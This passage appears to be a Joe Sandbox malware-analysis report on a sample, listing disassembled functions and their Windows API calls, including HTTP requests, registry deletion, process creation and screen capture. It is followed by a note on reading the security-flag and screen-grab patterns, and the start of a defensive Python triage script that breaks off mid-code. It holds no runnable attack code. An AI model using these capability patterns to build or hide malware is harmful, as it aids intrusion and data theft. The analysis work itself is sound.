                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                      • String ID:
                                      • API String ID: 895679908-0
                                      • Opcode ID: ed8c36929be71f15f3623266f1e874f02027933629d8b7c2bd0a1b3828300aff
                                      • Instruction ID: 15196a67065f35e9b57321df55426017351ddcce8993ea03fb11e14c4f20a7aa
                                      • Opcode Fuzzy Hash: ed8c36929be71f15f3623266f1e874f02027933629d8b7c2bd0a1b3828300aff
                                      • Instruction Fuzzy Hash: CA718D71A00B49AFDB20DFA9CE85AAEBBF5FF48718F104918E542E25A0D774E940DB50
                                      APIs
                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008A00C6
                                        • Part of subcall function 008A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0095070C,00000FA0,4F77B7F1,?,?,?,?,008C23B3,000000FF), ref: 008A011C
                                        • Part of subcall function 008A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008C23B3,000000FF), ref: 008A0127
                                        • Part of subcall function 008A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008C23B3,000000FF), ref: 008A0138
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008A014E
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008A015C
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008A016A
                                        • Part of subcall function 008A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008A0195
                                        • Part of subcall function 008A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008A01A0
                                      • ___scrt_fastfail.LIBCMT ref: 008A00E7
                                        • Part of subcall function 008A00A3: __onexit.LIBCMT ref: 008A00A9
                                      Strings
                                      • kernel32.dll, xrefs: 008A0133
                                      • SleepConditionVariableCS, xrefs: 008A0154
                                      • WakeAllConditionVariable, xrefs: 008A0162
                                      • InitializeConditionVariable, xrefs: 008A0148
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 008A0122
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 66158676-1714406822
                                      • Opcode ID: bc1b8530b5ec734ec805e8feb2c6c0eb6d489fa6bb2b137c745ed7d894edc20f
                                      • Instruction ID: 01b87f1f4c35cf314a45e9840429500e490af5b99220a27b3130c6e5b78717d5
                                      • Opcode Fuzzy Hash: bc1b8530b5ec734ec805e8feb2c6c0eb6d489fa6bb2b137c745ed7d894edc20f
                                      • Instruction Fuzzy Hash: D321497279C7056FFB106B68AC16FE933A4FB86B55F004139F901D66D1DB749800CE91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 176396367-1603158881
                                      • Opcode ID: a09b5488e84f3d87939e3b414b5f4200b90b62564c6c473738076ee5b8c3ab13
                                      • Instruction ID: 948c2ba2df51d9bc80de1f41e0a7534da51f8acee08907d2c9300aad1e28e3cd
                                      • Opcode Fuzzy Hash: a09b5488e84f3d87939e3b414b5f4200b90b62564c6c473738076ee5b8c3ab13
                                      • Instruction Fuzzy Hash: 92E12632A00656ABCB18DFB9C449BEEFBB0FF56714F548129E456F3280DB30AE458790
                                      APIs
                                      • CharLowerBuffW.USER32(00000000,00000000,0091CC08), ref: 008F4527
                                      • _wcslen.LIBCMT ref: 008F453B
                                      • _wcslen.LIBCMT ref: 008F4599
                                      • _wcslen.LIBCMT ref: 008F45F4
                                      • _wcslen.LIBCMT ref: 008F463F
                                      • _wcslen.LIBCMT ref: 008F46A7
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                      • GetDriveTypeW.KERNEL32(?,00946BF0,00000061), ref: 008F4743
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2055661098-1000479233
                                      • Opcode ID: bffeb52fc05060a21660ad7b3e0d7ef6760b3ece1e997ddd2e0e6045de9a9ac2
                                      • Instruction ID: cbd25c716e52a4e1ae0147e948018b9483ca89c81302b1117ada9a6077f32030
                                      • Opcode Fuzzy Hash: bffeb52fc05060a21660ad7b3e0d7ef6760b3ece1e997ddd2e0e6045de9a9ac2
                                      • Instruction Fuzzy Hash: EBB1B9716083069BC710EF38C890A7BB7E5FFA6724F50591AF696C7291E730D944CB62
                                      APIs
                                      • _wcslen.LIBCMT ref: 0090B198
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090B1B0
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090B1D4
                                      • _wcslen.LIBCMT ref: 0090B200
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090B214
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090B236
                                      • _wcslen.LIBCMT ref: 0090B332
                                        • Part of subcall function 008F05A7: GetStdHandle.KERNEL32(000000F6), ref: 008F05C6
                                      • _wcslen.LIBCMT ref: 0090B34B
                                      • _wcslen.LIBCMT ref: 0090B366
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0090B3B6
                                      • GetLastError.KERNEL32(00000000), ref: 0090B407
                                      • CloseHandle.KERNEL32(?), ref: 0090B439
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B44A
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B45C
                                      • CloseHandle.KERNEL32(00000000), ref: 0090B46E
                                      • CloseHandle.KERNEL32(?), ref: 0090B4E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2178637699-0
                                      • Opcode ID: d70abcc2364782d0a2ca71a8d41032fd295d9feec2a8b9c2e4330b113a7e7a39
                                      • Instruction ID: d129d29f779fb57ecdbf59063c54ec87e20bad19d603ac4cd2ae348bc6dc0fc0
                                      • Opcode Fuzzy Hash: d70abcc2364782d0a2ca71a8d41032fd295d9feec2a8b9c2e4330b113a7e7a39
                                      • Instruction Fuzzy Hash: 26F17B716082409FCB14EF28C891B6EBBE5FF85714F18895DF8959B2A2DB31EC44CB52
                                      APIs
                                      • GetMenuItemCount.USER32(00951990), ref: 008C2F8D
                                      • GetMenuItemCount.USER32(00951990), ref: 008C303D
                                      • GetCursorPos.USER32(?), ref: 008C3081
                                      • SetForegroundWindow.USER32(00000000), ref: 008C308A
                                      • TrackPopupMenuEx.USER32(00951990,00000000,?,00000000,00000000,00000000), ref: 008C309D
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008C30A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 36266755-4108050209
                                      • Opcode ID: 0d7fa07c245e8e57a4db2c980ddf99c29ebfa232bb8f9223c3bf4dcf7ab05691
                                      • Instruction ID: 13a0650e79e2aed2ccb42327deafa337bbddb2f4da6e57811d080e82cacf5ecc
                                      • Opcode Fuzzy Hash: 0d7fa07c245e8e57a4db2c980ddf99c29ebfa232bb8f9223c3bf4dcf7ab05691
                                      • Instruction Fuzzy Hash: 84711771644209BEEB219F29DC49FAABF75FF01764F20421AF524EA1E0C7B1E910DB91
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00916DEB
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00916E5F
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00916E81
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00916E94
                                      • DestroyWindow.USER32(?), ref: 00916EB5
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 00916EE4
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00916EFD
                                      • GetDesktopWindow.USER32 ref: 00916F16
                                      • GetWindowRect.USER32(00000000), ref: 00916F1D
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00916F35
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00916F4D
                                        • Part of subcall function 00899944: GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 2429346358-3619404913
                                      • Opcode ID: 25dc7cb58c7330f0ffc597f08e32a29ee1c183c2465f12230ffdd59e0f4a3a70
                                      • Instruction ID: 98f272b6b6e7a12d61641dd4ca543fb17061f2a6e872a1a11c0435ade4cdcdbc
                                      • Opcode Fuzzy Hash: 25dc7cb58c7330f0ffc597f08e32a29ee1c183c2465f12230ffdd59e0f4a3a70
                                      • Instruction Fuzzy Hash: 84718AB0644349AFDB21CF18DC58FAABBE9FB88304F04451DF99987261C770E946DB11
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008FC4B0
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008FC4C3
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008FC4D7
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008FC4F0
                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008FC533
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008FC549
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008FC554
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008FC584
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008FC5DC
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008FC5F0
                                      • InternetCloseHandle.WININET(00000000), ref: 008FC5FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                      • String ID:
                                      • API String ID: 3800310941-3916222277
                                      • Opcode ID: 0b310d6a00d04abed81cc243b509cc6eb4aa7c298ab973238545ab5f4d7407ee
                                      • Instruction ID: 2acc107d6cd43a378f4239b333c54aaa42d15b19741dea6ff9b50514e474c6f5
                                      • Opcode Fuzzy Hash: 0b310d6a00d04abed81cc243b509cc6eb4aa7c298ab973238545ab5f4d7407ee
                                      • Instruction Fuzzy Hash: 21513AB164460DBFDB218F74CA88ABB7BBCFB08754F008419FA45D6250DB74EA44EB60
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00918592
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185A2
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185AD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185BA
                                      • GlobalLock.KERNEL32(00000000), ref: 009185C8
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185D7
                                      • GlobalUnlock.KERNEL32(00000000), ref: 009185E0
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009185E7
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,000000F0), ref: 009185F8
                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0091FC38,?), ref: 00918611
                                      • GlobalFree.KERNEL32(00000000), ref: 00918621
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00918641
                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00918671
                                      • DeleteObject.GDI32(?), ref: 00918699
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009186AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: b040e3c9b2692096bfa12f8156b4a850213075b0c67b62ebbbd0f6bb1de13971
                                      • Instruction ID: 06efb53a48bd96c642907bb0f710df15bbff27e06247742e828c54f759c846c8
                                      • Opcode Fuzzy Hash: b040e3c9b2692096bfa12f8156b4a850213075b0c67b62ebbbd0f6bb1de13971
                                      • Instruction Fuzzy Hash: 704136B1744208AFDB118FA5CC88EAB7BBDEB89B51F108058F915E7260DB309941EB20
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 008F1502
                                      • VariantCopy.OLEAUT32(?,?), ref: 008F150B
                                      • VariantClear.OLEAUT32(?), ref: 008F1517
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008F15FB
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 008F1657
                                      • VariantInit.OLEAUT32(?), ref: 008F1708
                                      • SysFreeString.OLEAUT32(?), ref: 008F178C
                                      • VariantClear.OLEAUT32(?), ref: 008F17D8
                                      • VariantClear.OLEAUT32(?), ref: 008F17E7
                                      • VariantInit.OLEAUT32(00000000), ref: 008F1823
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: 9c3aeca3dd754b6a1a86d3112dbed662e63f0a34fd0f1d559a9edf96176b3c8b
                                      • Instruction ID: 04e53a37537815baa663c9924ffeeeb90934c6bbf4d693ac294b004ca55806a5
                                      • Opcode Fuzzy Hash: 9c3aeca3dd754b6a1a86d3112dbed662e63f0a34fd0f1d559a9edf96176b3c8b
                                      • Instruction Fuzzy Hash: 60D1DE71A0411DDBDF04AF79D888AB9B7B6FF48704F148056E646EB591DB30EC40DBA2
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 0090C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090B6AE,?,?), ref: 0090C9B5
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090C9F1
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA68
                                        • Part of subcall function 0090C998: _wcslen.LIBCMT ref: 0090CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090B6F4
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090B772
                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0090B80A
                                      • RegCloseKey.ADVAPI32(?), ref: 0090B87E
                                      • RegCloseKey.ADVAPI32(?), ref: 0090B89C
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0090B8F2
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0090B904
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0090B922
                                      • FreeLibrary.KERNEL32(00000000), ref: 0090B983
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090B994
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 146587525-4033151799
                                      • Opcode ID: 6263417d942ceac044eec31c0b8b1720c4e95939f4bc1bdb4ff09e5670045159
                                      • Instruction ID: e88b56bef57a0662ed542eecca414400ea28a7ee1ee279acad5379d01a275a61
                                      • Opcode Fuzzy Hash: 6263417d942ceac044eec31c0b8b1720c4e95939f4bc1bdb4ff09e5670045159
                                      • Instruction Fuzzy Hash: D9C18C31208201AFD714DF18C494F2ABBE5FF84318F14855CE5AA8B6A2CB75ED45CB92
                                      APIs
                                      • GetDC.USER32(00000000), ref: 009025D8
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009025E8
                                      • CreateCompatibleDC.GDI32(?), ref: 009025F4
                                      • SelectObject.GDI32(00000000,?), ref: 00902601
                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0090266D
                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009026AC
                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009026D0
                                      • SelectObject.GDI32(?,?), ref: 009026D8
                                      • DeleteObject.GDI32(?), ref: 009026E1
                                      • DeleteDC.GDI32(?), ref: 009026E8
                                      • ReleaseDC.USER32(00000000,?), ref: 009026F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 21baabb0a509e06dbff123ef8f596c60b68c460671c7afbc1a934812cd6d05bf
                                      • Instruction ID: 67a92bc8343359dc2f700488c27d27521bd9db9328b3a13bbd8ca023d3be9fe7
                                      • Opcode Fuzzy Hash: 21baabb0a509e06dbff123ef8f596c60b68c460671c7afbc1a934812cd6d05bf
                                      • Instruction Fuzzy Hash: E961F4B5E04219EFCF04CFA8D884AAEBBF5FF48310F24852AE955A7250D771A941DF50
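Two of the records in this section are the ones a triager would want to machine-check rather than eyeball: the WinINet routine (InternetQueryOptionW/InternetSetOptionW with option 0000001F, which is INTERNET_OPTION_SECURITY_FLAGS, set to 00000100) and the GDI routine just above (GetDC, CreateCompatibleBitmap, StretchBlt, GetDIBits, the classic screen-grab sequence). The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses "APIs" records in the layout shown on this page into per-function call lists, decodes the security-flags value against the public wininet.h constants, and tags records whose API set matches an illustrative signature table. The sample input is a constructed excerpt in the report's layout; the assumption that the 00000100 printed in the lpBuffer slot is the resolved DWORD rather than the pointer is labelled in the code. A static match only shows the capability is present in the image, not that it executed; check it against the report's dynamic behaviour sections before drawing conclusions.

```python
import re
from typing import Dict, List

# Constructed excerpt in the report's own "APIs" layout (shapes copied from the
# listing, trimmed to the calls that matter). One indented "Part of subcall"
# line is included so the parser is shown skipping callee references.
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008FC4B0
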